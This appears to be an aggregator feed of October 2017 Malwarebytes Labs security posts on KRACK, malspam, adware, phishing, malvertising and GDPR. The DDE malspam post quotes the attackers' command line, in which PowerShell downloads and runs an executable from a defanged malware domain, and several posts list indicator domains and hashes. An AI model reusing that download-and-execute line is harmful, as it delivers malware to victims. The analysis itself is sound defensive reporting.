How serious? If your device supports Wi-Fi, it is most likely affected. This feasible attack, dubbed KRACK, could abuse design or implementation flaws in the Wi-Fi standard, not some specific hardware. The KRACK attack, short for Key Reinstallation Attack, would allow a malicious actor within Wi-Fi range to insert himself into the network and intercept traffic between the device and the router.

This means everyone using WPA2 (the protocol known as Wireless Protection Access 2) could be impacted to some degree.

How impacted depends on multiple factors, but it ranges from traffic interception and decryption of encrypted data to injection of malicious traffic.

Android and Linux are especially vulnerable to this attack, as they can be tricked into re-installing an all-zero encryption key allowing full visibility into the traffic.

The good
  • Attacks can be somewhat mitigated if the traffic is HTTPS.
  • Apple has already patched iOS, macOS, tvOS, and watchOS. Great if your device is current; not so great if it isn’t.
  • Maybe this will finally get outdated routers retired and current ones patched?
  • Attacks are stymied by VPN usage.
  • If you have automatic updates on Windows, a patch has already been pushed, with a caveat. Microsoft still recommends contacting your hardware vendor to see if updated drivers for your wireless adapter are available.
  • Mathy Vanhoef did responsible disclosure and withheld public disclosure until major players could create patches.
The bad
  • Android users, with their fractured landscape and poor patching availability, are at risk, some with no possible solution.
  • Some routers will never receive an updated firmware making them vulnerable forever. Updating the firmware on a router is beyond what the average user feels comfortable doing.
  • While HTTPS can mitigate some attacks, improper implementations on websites are common, and once your traffic is routing through a maliciously controlled “man-in-the-middle” router, you’re vulnerable to other traffic manipulation.
  • Expect KRACK to go from POC to practical deployment at the coffee shop very quickly. Remember Firesheep? WEP wardriving? Someone is bound to make an app that will dramatically lower the difficulty to exploit this.
  • This won’t be fixed fully until the Wi-Fi standard is changed.
What to do about it
  • Run updates on all your devices, systems, and software. If you don’t have automatic updates on your windows machine, look out for the Microsoft patch, which they issued on October 10.
  • Android users: Keep your eyes peeled for updates from Google, which they said would be available in the coming weeks.
  • If you’ve got Apple products, update them to the latest versions, which will protect against a KRACK attack. Older versions will be vulnerable.
  • See if your router manufacturers have issued updated firmware that addresses this vulnerability and update as soon as possible. If not, you might consider replacing the router.
  • It is important to keep in mind that it’s not only individuals who are impacted by this vulnerability, but also businesses. Any Wi-Fi deployment that uses WPA2 can be exploited. This means organizations should also push updates and be sure remote workers are securing their devices and systems as well.

The post Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Old MS Office feature weaponized in malspam attacks

Malwarebytes - Tue, 10/17/2017 - 15:00

There has been a lot of talks recently following a write up and proof of concept about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

First, the DDE was used in some targeted attacks. However, now it has become mainstream with the group behind Hancitor (spotted by @James_inthe_box and DDE identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a Yara rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\\Windows\\System32\\cmd.exe " /k powershell.exe (New-Object System.Net. WebClient).DownloadFile('http://frontiertherapycenter[.]com/16.exe', '%TEMP%\\tvs.exe');Start-Process '%TEMP%\\tvs.exe'"</w:instrText>

The rest of the attack is straight forward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes and consider the validity of retaining it.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document




The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Yet more mobile adware found in Google Play

Malwarebytes - Tue, 10/17/2017 - 07:25

Finding an adware variant that made its way past the Google Play store is out of the ordinary. So when two adware variants slip by in one week, we take notice. Last week, we added two new Ad SDKs to our growing list of adware detections—Adware.Solid and Adware.Cootek. Both Ad SDKs were found in an abundance of apps in Google Play. Adware.Cootek infects over 2,000 Play store apps alone, according to our Mobile Intelligence System.

Behaving badly

Both pieces of adware have remarkably similar traits, displaying full screen ads inside and outside of the infected running app. In addition, they both show ads during screen lock and immediately after unlocking the screen. For your viewing pleasure, below you can find an array of offending ads with captions detailing the inappropriate timing:

Click to view slideshow. We’re listening

Ads displayed inside a free app? Fair game. Ads displayed outside the app, especially during and immediately after screen lock? That, my dear readers, is where we draw the line. Many of these apps contain reviews on Google Play addressing the aggressive nature of the ads contained. Unfortunately, these reviews fall on the deaf ears of the app developers. But fear not my friends, for we are listening. Whether it’s in Google Play or not, we take a hard stance on aggressive adware. Cue shameless (yet helpful) plug: Malwarebytes for Android warns you when Ads are crossing the line.

Use common sense

A note to app developers. We get that you need to make some revenue from your hard work, and selecting an appropriate Ad SDK to tack onto your apps is tough business. Perhaps it’s unfair to take the blame when at the time the Ad SDK was selected, it wasn’t considered adware. However, I ask this question: How many bad reviews does it take before you repackage with another, less offensive, Ad SDK? One app we found which will remain nameless had around 400 one star reviews, and I’m willing to bet most were addressing the aggressive ads. Think about how you’d like to interact with an app: would all of those aggressive ads make you enjoy the app even more, or would they frustrate you? Use common sense when selecting an Ad SDK.

It’s up to the user

As already addressed in our Mobile Menace Monday post, we know that mobile adware is not dangerous malware—more like an inconvenience. In some cases, it goes behind annoyance when it is collects too much personal information. This can include GPS location, phone number, IMEI, and IMSI. Still, this isn’t a blatant act of maliciousness as seen from far more threatening pieces of malware.

It’s fully up to you, the user, whether to delete the offending app or ignore our warnings. If you choose to ignore and accept the presence of these annoying ads and/or the potential to collect personal information, no further harm should come your way. Admittedly, we can’t fully guarantee this claim—thus, I leave you with this: Ignore at your own risk.

Unfortunately, we called it

When Google Play Protect was released, I conveyed my concern for adware along with other Potentially Unwanted Programs (PUPs) still making their way into the Play market. Unsurprisingly, here we are with two new pieces of adware found in one week. My prediction is that this is only the beginning. Stay safe out there!

The post Yet more mobile adware found in Google Play appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 9 – October 15)

Malwarebytes - Mon, 10/16/2017 - 19:00

Last week on the Labs blog, we talked about GDPR as part of our series in the National Cyber Security Awareness Month (NCSAM). We also discussed a new method for phishing Apple ID passwords and the possible ramifications. We analyzed the malvertising chain due to a script that was found on popular websites like those of Equifax (!) and TransUnion. And we explained how decoy Word documents are used to deliver malware using the hyperlink feature in the OpenXML format.

Malwarebytes news

It was a great week for Malwarebytes since we won three awards at the 2017 Computing Security Awards: Security Company of the Year, Editors Choice, and Malware Solution of the Year. And we were chosen as the winner in the “Rising Star: Cybersecurity Solution” category of NetworkWorld Asia 2017 Readers’ Choice Awards.

Our CEO, Marcin Kleczynski, was interviewed by the Huffington Post on the subject 5 things I wish someone told me before I became CEO. And the Malwarebytes Labs team presented you with the quarterly Cybercrime Tactics and Techniques looking back at an unprecedented season of breaches.

Other security news Business

Akamai presented their findings on a large-scale Fast Flux botnet at their annual customer conference. The botnet using Fast Flux techniques has over 14,000 IP addresses associated with it. Some of the associated IP addresses are in address spaces that are assigned to Fortune 100 companies. These addresses are most likely used by the Fast Flux network owner as spoofed entities and are not genuine members of the network. This allows the botnet to inherit the reputation of the Fortune 100 companies.

Pen Test Partners, a UK cybersecurity company, found appalling security lapses while investigating naval ships that had equipment exposed online. Ships nowadays are complex industrial machines: traditionally isolated, now always-on, connected through VSAT, GSM/LTE, and even Wi-Fi. Crew Internet access, mashed up with electronic navigation systems, ECDIS, propulsion, load management, and numerous other complex, custom systems is a recipe for disaster if not properly secured.

The Register discussed whether the law that would allow hacking victims to seek revenge and hack the hackers who hacked them is a good idea or not. The Active Cyber Defense Certainty Act amends the Computer Fraud and Abuse Act to make limited retaliatory strikes against cyber miscreants legal in America for the first time. The bill would allow hacked organizations to venture outside their networks to identify an intruder and infiltrate their systems, destroy any data that had been stolen, and deploy “beaconing technology” to trace the physical location of the attacker.

A series of distributed denial of service (DDoS) attacks aimed at Sweden’s transportation services caused train delays and disrupted over travel service. The DDoS bombardment reportedly crashed the IT system that monitors trains’ locations and tells operators when to go or stop. It also took down the federal agency’s email system, website, and road traffic maps.


Politifact was named as yet another site using cryptominers to have visitors pay for their visit to the site. We described the growing number of sites using drive-by mining some time ago.

Android users downloading a fake Adobe Flash Player from a malicious website may find themselves victimized by a unique strain of Android ransomware called DoubleLocker. “The most interesting thing here is that it uses a dangerous combination of three aspects we have not seen before: accessibility services, which perform a click on the user’s behalf; it encrypts data; and it can reset a PIN for a user’s device.”

Stay safe everyone!

The post A week in security (October 9 – October 15) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Phishes, pseudophishes, and bad email

Malwarebytes - Mon, 10/16/2017 - 18:00

Everyone knows about phishing. We’ve all heard that the solution to phishing is to educate the user as, after all, it must be the user’s fault for stupidly clicking on the thing. But what about when perverse incentives make clicking the phish seem logical? What about the enterprise pseudophish—when design-by-committee language, lack of attribution, and over broad requests for personal information make something look like a phish?

Users will frequently be inundated with corporate requests for information; requests they are often required to comply with. When companies that don’t think these things through end up with something that apes the style of a phish, they can be training their users to click on actual phishes that come their way. Let’s check out a recent example pertinent to the Anthem breach settlement a few months back.

This legitimate email relies fairly heavily on the style and tone favored by phishes for decades. First of all, the email includes a lengthy “Claim ID” string without explaining what that means to the user. Next is the all-caps appeal to authority of a “court-approved legal notice.” The sender then includes an urgent call to action bounded with a deadline to induce anxiety. Lastly, they provide links with no indication of content and no direct connection to Anthem that the user is expected to click on.

Stylistically, the whole thing is a mess of odd margins and shifting formatting for no particular reason.  Most concerning is that nowhere in the email does it address who the sender is, how they got your email, or what their connection to Anthem is.

Are there other ways to verify the legitimacy of the email, like examining headers, running the URL provided in a test VM first, or searching on the provided number? Of course. But can we realistically expect the user to do that for every ill-thought out communication?

User education

The presumption of many security professionals is that clicking a malicious link is a lapse in judgment or temporary insanity on the part of the user. But given the above legitimate message that the user is required to read and act upon, is it unreasonable that they would click on a Dridex malspam using the same pitch? Would we as network defenders be shocked to see a phish that looked like this? And finally, given the absurdly high volume of email most end users deal with in an office environment, aren’t we really educating them to go ahead and click?

Please don’t do this

How do you stop phishing your own users? Before you hit send, make sure of the following:

  • Use consistent text formatting, spacing, and justification.
  • Don’t use third-party assets unless you know the user can display them in the same way you can.
  • Identify yourself, and provide a backchannel to verify who you are outside of the email. Faceless entities engaged in unsolicited contact to spur the user with an urgent call to action is a textbook phishing pitch.
  • Provide the full URL to links you want clicked. One of the most basic tricks in a phish is to hide or obfuscate an URL to discourage vetting by the user.

Malspam mitigation comes with many technical fixes: disabling office Macros, blocking unnecessary outbound traffic on a given user group’s profile, or blocking local execution of scripts, to name a few. But if the ultimate fix for phishing and malspam is the user who simply deletes the offending message, a simpler (and cheaper) fix is to stop flooding them with pseudophishes. Some additional time and forethought on user experience can create incentives leading to better security outcomes for everyone.  When we send a clear, consistent message on security, we all stay safer.

The post Phishes, pseudophishes, and bad email appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: despicable adware

Malwarebytes - Mon, 10/16/2017 - 17:00

Are you wondering how that mysterious icon ended up on your Android phone’s start screen? Annoyed at the ads clogging your notification bar? You aren’t alone. Thousands of Android apps now include software that shoves marketing icons onto your phone’s start screen or pushes advertising into your notification bar. These apps give you no warning about the adware invasion.

Even though many of these ads come from different mobile marketing companies, all have the same goal—to make money. Working with app developers hungry for some way to make money themselves, these marketing companies will do anything to make a buck. So they’ll bundle popular apps with adware and bombard millions of users with advertising each week.

Introduction to adware

So what, exactly, does adware do? Adware such as Startapp is a subcategory of Potentially Unwanted Programs (PUPs), which are apps or other types of software that you likely didn’t want installed on your computer, either because they hid their true nature or because they came bundled with other wanted programs. So if you download a popular app that comes bundled with adware, you may be in for a less-than-pleasant experience.

Once adware hijacks your device, it might carry out all sorts of unwanted tasks. For example, it could display questionable advertising content as icons, notification messages in the device interface, or pop-up messages. It might also change your browser front page or default search engine. It doesn’t matter whether you are using Chrome, Firefox, or other browsers: It affects all of them.

Let’s take as an example an app called Qr Code And Barcode Reader, which was once available on the Google Play market, but has now been removed. Qr Code marketed itself as a simple barcode reader, but hiding in plain sight was adware.

As discussed in our blog Mobile Menace Monday: Implications of Google Play Protect, Google Play is not impenetrable. In fact, during the time of this writing, two new types of Adware were found in Google Play; Adware.Solid and Adware.Cootek. This is probably why the Qr Code app was available on the market in the first place. So let’s pretend we found this app in Google Play and decided to install it.

First evidence

When you first install Qr Code, it will ask you for device admin permissions without any note of why it needs these rights. If you’re a discerning user, this first piece of evidence may lead you to certain conclusions about the legality of the application itself. However, most people would probably take a quick glance and hit “activate” in order to get the app they were looking for.

Once you select “activate,” you give the app full access to the phone. This is when the app launches its evil plan to load and show ads directly on the home screen. We can explicitly observe this from logcat, a tool used to view real-time system messages on an Android device.

 Logcat evidence  09-03 07:55:29.961 589-701/system_process I/ActivityManager: START u0 {flg=0x14000000 cmp=com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity} from uid 10064 on display 0 09-03 07:55:29.972 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 W/GooglePlayServicesUtil: Google Play Store is missing. 09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Starting ad request. 09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Use AdRequest.Builder.addTestDevice(“7C6CCED8FF697C98BEAA38D05BG347D4”) to get test ads on this device. 09-03 07:55:30.500 589-610/system_process I/ActivityManager: Displayed com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity: +532ms Scalpel, clamp

If you want to find the smoking gun, a technically savvy person would check the manifest file, where you can see that permissions and activities, services, and receivers are in the list associated with Adware.Startapp—thus without any doubt we can say that this Qr Code app has adware components inside.

android:name="" Service:
android:name="" Receiver:
android:name="" Methodology

Now we know Qr Code is certainly delivering adware. But in which way? There are many methods of displaying ads, including banners, splash ads, and exit ads. Qr Code uses Interstitial Callback methods.

Interstitial ads are full-screen ads that cover the interface of their host app. They typically appear between natural transition points in the flow of an app, such as between activities or during the pause between levels in a game. When an app shows an interstitial ad, the user has the choice to either tap on the ad and continue to its destination or close it and return to the app.

  • Callback method when Interstitial Ad is loaded:
startAppAds.loadAd(new AdEventListener()
  • Callback method when Interstitial Ad is shown:
startAppAds.showAd(new AdDisplayListener()


This type of ad is disruptive, sometimes difficult to close, and often results in a frustrating user experience.

But what you need to keep in mind when faced with adware is that, despite being incredibly bothersome, it is generally not malicious. There’s a significant difference between adware and dangerous malware such as Trojans or ransomware. Therefore, there’s no need to worry or panic: your device is not under imminent threat.

In fact, many mobile applications that are free of charge often include third-party advertising content. This is done as an alternative form of revenue for the software developers, as a result of not charging users for the application itself. Sometimes using these apps outweighs the inconvenience of having adverts displayed. It’s up to you to decide what you’ll put up with in exchange for keeping the application installed.

However, in our opinion, adware does more harm than good, and you shouldn’t have to put up with overbearing pop-ups in order to enjoy an app. (Malwarebytes for Android will detect adware and remove it if you choose.) So next time you download an app, take a hard look at what it includes. If adware is present, you might do better to choose another one!

The post Mobile Menace Monday: despicable adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Decoy Microsoft Word document delivers malware through a RAT

Malwarebytes - Fri, 10/13/2017 - 15:00

In this post, we take a look at a Microsoft Word document which itself is somewhat clean, but is used to launch a multi-stage attack that relies on the hyperlink feature in the OpenXML format. This then loads another document that contains an exploit.

Most malicious Microsoft Office documents involve either macros, embedded scripts, or exploits and are typically delivered via email. In this case, the unsuspecting user opening the decoy Word document will trigger an automatic (no click or interaction required) download of a malicious RTF file that deploys an exploit (CVE-2017-8759), which ends up distributing the final malware payload.

The several-step removed payload is a commercial Remote Administration Tool that, in this case, is used for nefarious purposes. Victims will be none-the-wiser as the infection process happens in the background, while their Word document finally loads what looks like legitimate content.

While attackers could have sent the exploit-laced document first, that might have triggered detection and quarantine at the email gateway. Instead, the benign document acted as a kind of Trojan horse that made its way to the end user’s desktop, where it would finally show its real intent.

The diagram below summarizes the different steps that this attack takes, from the original document all the way to the malware payload.

Initial package

The initial document was reported by @xme on Twitter. A quick check using oletools indicates that the file has the OpenXML format and no macros.

FILE: Product Description.docx Type: OpenXML No VBA macros found.

Since OpenXML files are archives, they can be decompressed to reveal their content.


Opening document.xml.rels reveals an interesting external URL, pointing to another document.

The relationship with Id=”rID6″ is loaded by the main document.xml file. If we open the document without network connectivity (to prevent the automatic execution), we can spot where this object is located.

The actual exploit: CVE-2017-8759

The remote file saqlyf.doc is downloaded and opened by Product Description.docx into the Temporary Internet Files folder.

This time, it is an RTF file.

After we convert the hexadecimal encoding to binary (oledump), we can spot another interesting URL.

At this point, we could be looking at CVE-2017-0199 if the server provided a MIME type response of application/hta. But in this case, we have something different, and we can quickly spot the SOAP-related bug associated with CVE-2017-8759.

The above code will parse and execute the content of the oghujp.hta file pictured below.

The nasty bit is encoded with ChrW but we can let VBScript do the work and output what it is in human, readable terms.

This is the final part of the exploitation phase, and it involves running PowerShell to download and run a binary.

Attack payload: a RAT

This attack was meant to install a commercial Remote Administration Tool known as Orcus Rat, which as seen previously was also hosted on the same server containing the exploit. The program is written in .NET and contains functions such as keylogging, remote desktop, or access to the webcam.

The file is concealed as mozilla.exe and periodically checks with its command and control infrastructure.

While commercial RATs can be used for legitimate purposes, malicious actors often abuse them for their own sinister goals.


Part of the malicious VBScript creates a fake document on the fly that is displayed to the user. If you look carefully, you will notice that the file is called Document1, therefore it’s an additional file to the original Product Description.docx one. It also contains too many typos (but that’s a debate for another day).

Attack infrastructure

The exploit and payload used in this attack are served from a free file hosting site at pomf[.]cat.

A cursory look at the site revealed that many other malicious files are also hosted on this platform. We have reached out and requested a takedown of the offending files.


This type of attack relies on a little bit of social engineering to trick the user into opening a Word document, while the rest is handled by an exploit that was patched just a month ago. It’s quite likely many machines out there are still vulnerable if those updates have not been applied in a timely fashion.

Scanning for the original document at the gateway may not have returned anything due to its relatively benign nature, and this is why protection at the end point is so important. More and more attacks these days are modular and retrieve payloads on the fly in order to evade detection.

Malwarebytes users are already protected against this exploit. Additionally, we detect the RAT as Backdoor.NanoCore.


Indicators of compromise

Initial document (Product Description.docx)


RTF (CVE-2017-8759) 5758c31928c5f962fbb3ec2d07130e189a8cf4f3fbd0cd606cb1c1d165334a1c

PNG (CVE-2017-8759) 5ed4582313d593a183ab0b8889dc3833c382ce9ca810287d0fcf982275b55e60

HTA (CVE-2017-8759) b048a2d2ea3bb552ac6e79e37fc74576a50c79b4d8c9fd73b1276baabc465ebf

Payload (RAT) 72041b65777a527667e73ccc5df95296f182e4787f4a349fcbe0220961dd0ed2

The post Decoy Microsoft Word document delivers malware through a RAT appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Equifax, TransUnion websites push fake Flash Player in malvertising campaign

Malwarebytes - Thu, 10/12/2017 - 21:42

Dan Goodin reported on Ars Technica that the Equifax website was involved in yet another kerfuffle, this time pushing a fake Flash Player. Looking at the YouTube video of this incident frame by frame, we were able to retrace some of this malvertising chain. (Equifax) -> -> -> -> -> (fake Flash)

For those tracking malvertising, this is a very familiar sequence. However, a question remained as to how we got to the ostats[.]net URL. Dan Goodin shared a link about a possible culprit, namely a third-party library which would have been loaded from:

Since Equifax pulled that site down, it was not possible to identify what that script exactly did. However, a quick search for other websites that were using it returned—surprisingly—another consumer reporting credit agency, namely TransUnion and their Central America website.

By visiting transunioncentroamerica[.]com, we were able to confirm that this fireclick.js script was indeed part of this redirection chain.

This chain ultimately leads to the fake Flash player.

ostats[.]net domain is performing all sorts of redirections, as seen in this RiskIQ’s PassiveTotal search.

During our tests we encountered fake surveys, Flash updates, and also a redirection to the RIG exploit kit.

Third-party script

Fireclick is a legitimate analytics company. If we look at the script closer, we can see that it loads a URL from the Akamai CDN.

In turn, this loads content from another domain snap.sitestats[.]info.

This eventually leads to ostats[.]net.

Some other websites have the script embedded directly into their main page, and they also are involved in this malvertising campaign.

We are still investigating the incident and will report any updates we find on this blog. In the meantime, Malwarebytes users are protected against malicious redirections from this attack.

Indicators of compromise 10/12/2017 11:58:32 AM,GET,,a248.e.akamai[.]net,CDN 10/12/2017 11:58:33 AM,POST,,snap.sitestats[.]info,Stats site 10/12/2017 11:58:34 AM,GET,,snap.sitestats[.]info,Stats site 10/12/2017 11:58:35 AM,GET,,ostats[.]net,Redirector 10/12/2017 11:58:35 AM,GET,,itechnews[.]org,Malvertising 10/12/2017 11:58:36 AM,GET,,[.]com,Malvertising 10/12/2017 11:58:36 AM,GET,,usd.zeroredirect6[.]com,Malvertising 10/12/2017 11:58:37 AM,GET,,www.temocycle[.]site,Malvertising 10/12/2017 11:58:37 AM,GET,,www.theapplicationappmy23[.]download,Fake Flash site 10/12/2017 11:58:38 AM,GET,,www.bestapps4ever161[.]download,Fake Flash site

Fake Flash player


The post Equifax, TransUnion websites push fake Flash Player in malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs report: summer ushers in unprecedented season of breaches

Malwarebytes - Thu, 10/12/2017 - 16:00

In this edition of the Malwarebytes Cybercrime Tactics and Techniques report for the third quarter of 2017, we saw a number of high profile breaches targeting the personal information of hundreds of millions of people. While the Equifax breach may have dominated the news cycle, notable attacks against the UK National Health Service (NHS), Instagram, Whole Foods, and Sonic were also reported. In addition, we’ve observed shifts in malware distribution, the revival of some old families, and found cases of international tech support scams.

For the full report, click here. For a summary of the report, check out the video and read on below!

Windows malware

Over the last quarter, we have observed several active spam campaigns pushing the Emotet banking Trojan on Windows systems. This malware makes money by intercepting network traffic and stealing bank account details, then selling them on the black market. In addition, Emotet has also been observed utilizing sophisticated evasion techniques to help hide from security software and spread the infection.

Mac malware

In Mac malware news, we have seen continuous growth and several long-term attackers coming back from the dead; families discovered years ago, made a comeback this quarter with new variants.

What this means is that Macs are beginning to attract more persistent adversaries who see the value in infecting Mac users. Apple still has a minority market share in the personal computer world, but they have become increasingly popular and their product’s mythical immunity to malware has been revealed to be just that, a myth.

Android malware

This quarter in Android malware, users have been targeted by a new ‘clicker’ Trojan we call Trojan.Clicker.HYJ. This malware has the capability to spread to other devices by utilizing the victim’s contact list.

Potentially unwanted programs

The adware industry has gone to great lengths to avoid detection by security products, which leaves your system wide open to infection by malware. The adware SmartScreen comes bundled with other PUP software, and its overall goal is to push advertising to any user who installs it. It also hooks into the operations of Windows, blocking security software from running. In the report, we take a deeper look at this pseudo-malware and what it can do.

Tech support scams

Multi-language tech support scams are on the rise globally, driven by geo-targeted malvertising campaigns. We expect an increase in the next quarter.


Put these on your calendars:

On October 25 at 11:00 am (PST) we’re hosting a webinar taking a deeper look at this quarter’s Cybercrime Tactics and Techniques report. Register here.

We’ll be doing a live webcast on November 2 @ noon (PST) on Facebook and YouTube. The event is going to feature Thomas Reed, our Director of Mac Offerings, and we are going to talk about historical Mac malware as well as what you are likely to encounter today, and how to stay safe from it.

Download full report here

We hope you enjoy the latest Cybercrime Tactics and Techniques report. We’d love to hear your feedback. What do you think about developments in cybersecurity this last quarter? What would you like to learn about next quarter? Thanks for reading and safe surfing!

The post Labs report: summer ushers in unprecedented season of breaches appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A new kind of Apple phishing scam

Malwarebytes - Wed, 10/11/2017 - 17:15

In a recent blog post, Felix Krause revealed a method for phishing Apple ID passwords on iOS that would be quite indistinguishable from a real iOS password request. This got us thinking about the ramifications—how else could this tactic be used in the Apple ecosystem, and what kind of damage could it do?

Image courtesy of

In the case of Krause’s iOS phishing scam, by using simple code any app could easily simulate a standard iOS password request, and most users wouldn’t think anything was amiss. Looking at Krause’s example above, I have to admit that this is something I might fall victim to, although I might wonder why the request was showing up within the context of a third-party app.

However, I don’t see this particular phish as a huge risk. iOS apps can only be downloaded through the App Store, and although I would never say that it’s impossible to get a phishing app into the App Store, it certainly would not be an easy thing to do. Not only would the hacker have to sneak this code past the review, they’d also have to create a decoy app that would be compelling enough to download—something that is increasingly difficult even for legitimate developers in the crowded iOS App Store. I view this as possible, but unlikely.

Of course, there are many other cases where the App Store screening process wouldn’t come into play, and that could be equally convincing, if not more so.

For example, consider macOS instead of iOS. Unlike on iOS, Mac users can download apps from anywhere, and frequently do. That’s how Mac users end up infected with things like malware, adware, and unethical junk software. Thus, there’s no review process a hacker would have to submit to.

Suppose you’re using your Mac, and suddenly the Mail app opens and shows a password request because of a failure with your iCloud account. It might look something like the image below. What would you do?

Would you enter your iCloud account password there? After all, it will reliably cite a correct iCloud account address. If you did enter your password in this case, sorry to tell you, you’d be pwned.

Okay, maybe that’s not the most convincing password request if you’re a Mac expert and know what these things are supposed to look like. (I can hear the criticisms now.) However, there are a couple important things to keep in mind.

First, this would trick a LOT of people. Sure, maybe not Mac aficionados, but most people are not, and shouldn’t have to be, experts in what every single macOS dialog looks like.

Second, this was the result of a four-line AppleScript I threw together in all of five minutes, with three of those lines involved in getting the email address associated with the user’s iCloud account. It would be entirely possible to make this far more convincing. Even just using AppleScript, it would be possible to use different techniques, and at least one that I can think of, for which I’ve seen a proof-of-concept, would be highly convincing.

Worse, it would be easy to mimic a real macOS authentication dialog, pixel-for-pixel, without too much effort in an app compiled in Xcode.

In fact, a similar event happened earlier this year, when Handbrake was hacked to install the Proton malware. The malicious copy of Handbrake ended up requesting the login password in such a way that even experts fell for it, such as a developer for the well-respected Panic, Inc.

We have become accustomed to such password requests as a part of our daily life, so when we see them, we tend to just enter the password without thinking about it. After all, Macs don’t get malware, right? Fortunately for Mac users, the actual incidences of this kind of harmful malware have been few, but that works in the hackers’ favor, since we’ve become inured to these requests and don’t treat them with the suspicion that they deserve.

So, what can be done about this kind of thing? Unfortunately, there is no one thing that Apple could do to solve this problem. An app will always be able to display a pixel-perfect simulation of any official macOS or iOS password request.

Worse, even a web developer could do the same, by combining screenshots from the target system and a web form. The code could detect the system and display an appropriate “window” for macOS, iOS, Windows, or Android. Slip something like that in as an overlay on top of a hacked legitimate site and you could fool a lot of folks.

Although Apple could direct the user at all times to a known, good location to enter passwords, that’s not always reasonable. Consider, for example, the horrible user experience Apple has foisted on Mac users with the new User-Approved Kernel Extension Loading process in macOS High Sierra. Although this is not the same as a password request, it’s a good example of how forcing the user to a location for security reasons could go horribly wrong, resulting in a bad user experience that may not actually be significantly more secure.

Instead of seeking fixes for something that can’t be fixed, we need to focus on changing our own behaviors. Every password request should always be viewed with suspicion, no matter the source. If Mail pops open and a window appears asking for a password, that doesn’t mean it’s actually Mail doing the asking.

Treating these password requests with suspicion means, in some cases, canceling and entering the password in a known, good location. For example, if an iCloud password is being requested, you should manually go to the iCloud pane in System Preferences to enter it.

Unfortunately, this is not always possible, as in the case of an installer asking for a password or an app asking for a password to install a helper tool. In the case of Handbrake, it is not normal for Handbrake to ask for a password, so seeing a password request in that context is a red flag. Although I must admit that I might have fallen for the fake Handbrake password request, if I were being more careful, I would check the developer’s website or product documentation to see if that is normal for Handbrake.

If the request comes up while you’re using your web browser, try moving the current web browser window around on the screen. If the “window” moves along with it, it’s not actually a window. It’s an element overlaid on top of the web page meant to look like a window, and that will mean it’s a fake.

It would also be possible to test these password requests by knowingly entering an incorrect password. Phishing malware or websites can’t know what your password is until you enter it, so they can’t know you entered the wrong password intentionally, and will simply accept what you typed. If, on the other hand, the bad password is rejected, it’s likely that the password request is legitimate.

With a little caution and attention paid to the context of password requests, you can avoid most, or even all, phishing attempts. The important thing is to be consistent, and not to get sloppy because you’re in a rush.

The post A new kind of Apple phishing scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Make way for the GDPR: Is your business ready?

Malwarebytes - Tue, 10/10/2017 - 17:13

In Week 2 of National Cyber Security Awareness Month (NCSAM), the spotlight is on businesses—particularly, their more profound need to take cybersecurity seriously in this age of breaches. And what better way for them to start this off than to think about how they can improve on handling and storing their clients’ data safely and securely?

If this sounds more like a privacy issue to you, it is. What many should realize is that privacy and security are closely linked. In fact, one cannot think of improving on privacy without improving on security as well, and vice versa.

With the coming of the General Data Protection Regulation (GDPR), a chiefly privacy-focused ruling for companies doing business in Europe, in less than nine months time, a majority of B2C and B2B organizations in the US still have a lot of catching up to do in the matter of compliance. So, without much ado, let’s get down to the nub of what to do to prepare for GDPR’s approach.

Read: National cybersecurity awareness month: simple steps for online safety

  • Prioritize. Senior management must be on board with preparations needed for change to happen. The GDPR is not something your IT department can handle on their own. In fact, the GDPR transcends the boundaries of IT and extends to other areas in the organization, such as marketing and sales. It’s high time for companies to wake up and act fast by putting cybersecurity and data privacy at the top of their priority list.
  • Assess. Take the time to sit down and review your current and target customer base. This is a crucial stage as results will dictate whether your business must comply with GDPR standards or not. (Though a bulk of US businesses are small businesses, and not all of them cater to European and UK citizens, even with an online presence.) If your company does handle personal data from citizens of European member states, ascertain what types of data you currently transmit, process, and store. Also, weigh the value of each data type you are storing. Ask yourself this: “Does the company really need to keep this data? Does this bring sufficient value to the company?” If both answers are “no,” it might be best to get rid of it.In June, popular pub and hotel chain, JD Wetherspoons, decided to delete their full database of client email addresses, which they had used to send email newsletters, after evaluating that they don’t want to hold them anymore. Instead, they decided to use social media to notify patrons of deals and special offers.

    Here are other questions to guide you in your assessment:

    • How do you get personal data from your clients? (e.g., forms in company website)
    • Where do you store client personal data? (e.g., PC hard drive, the cloud)
